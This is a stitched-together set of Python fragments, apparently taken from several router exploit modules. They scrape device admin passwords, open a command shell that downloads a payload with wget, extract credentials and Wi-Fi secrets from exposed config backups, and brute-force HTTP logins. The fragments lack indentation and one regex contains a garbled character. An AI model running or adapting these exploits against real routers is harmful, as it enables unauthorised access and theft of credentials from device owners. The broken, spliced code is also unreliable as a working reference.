pattern = r"NAME=\"OldPwd\" SIZE=\"12\" MAXLENGTH=\"12\" VALUE=\"([�-9]+)\""
password = re.findall(pattern, r.content)[0].replace(
'&', ';&')[1:] + ";"
print_success("Target password is : {}".format(password))
except Exception:
print_error("Unable to connect to target")
def run(self):
try:
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
print_status(
"Please note that only first 256 characters of the "
"output will be displayed.")
shell(self,
architecture="armle",
method="wget",
location="/tmp")
else:
print_error("Target is not vulnerable")
except socket.error as ex:
print_error(
"Socket error ({ex}). It most likely means that something "
"else is listening locally on port UDP:{port}. Make sure to "
"kill it before running the exploit again.".format(ex=ex,
port=9999))
def run(self):
creds = []
url = "{}:{}/password.cgi".format(self.target, self.port)
try:
response = http_request(method="GET", url=url).text
except AttributeError:
return
tokens = [("admin", r"pwdAdmin = '(.+?)'"),
("support", r"pwdSupport = '(.+?)'"),
("user", r"pwdUser = '******'")]
for token in tokenize(tokens, response):
creds.append((token.typ, token.value[-1]))
if creds:
print_success("Credentials found!")
print_table(("Login", "Password"), *creds)
else:
print_error("Credentials could not be found")
def run(self):
if self.check():
print_success("Target is vulnerable")
url = "{}:{}/goform/system/GatewaySettings.bin".format(
self.target, self.port)
response = http_request(method="GET", url=url)
if response is not None and response.status_code == 200 and "MLog" in response.text:
print_status("Reading GatewaySettings.bin...")
plain = self.decrypt_backup(response.text)
name, pwd = self.parse_backup(plain)
print_success(
'Exploit success! login: {}, password: {}'.format(
name, pwd))
else:
print_error("Exploit failed. Could not extract config file.")
else:
print_error("Target is not vulnerable")
def run(self):
if self.check():
print_success("Target is vulnerable")
url = "{}:{}/config.bin".format(self.target, self.port)
print_status("Sending payload request")
response = http_request(method="GET", url=url)
if response is not None and response.status_code == 200:
print_success("Exploit success")
print_status("Reading file config.bin")
password, authKey, cPskSecret, cUsrPIN = self.decrypt_config_bin(
response.content)
print_success("Found cPskSecret:" + cPskSecret)
print_success("Found cUsrPIN:" + cUsrPIN)
print_success("Found authKey:" + authKey)
print_success("Password combination from top to bottom:" +
'\n' + password)
else:
print_error("Exploit failed. Device seems to be not vulnerable.")
def target_function(self, url, creds):
name = threading.current_thread().name
user, password = creds
user = user.encode('utf-8').strip()
password = password.encode('utf-8').strip()
response = http_request(method="GET", url=url, auth=(user, password))
if response is not None and response.status_code != 401:
print_success(
"Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'"
.format(self.target, self.port, name, user, password),
verbose=self.verbosity)
self.credentials.append((self.target, self.port, user, password))
if self.stop_on_success:
raise StopThreadPoolExecutor
else:
print_error(
"Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'"
.format(self.target, self.port, name, user, password),
verbose=self.verbosity)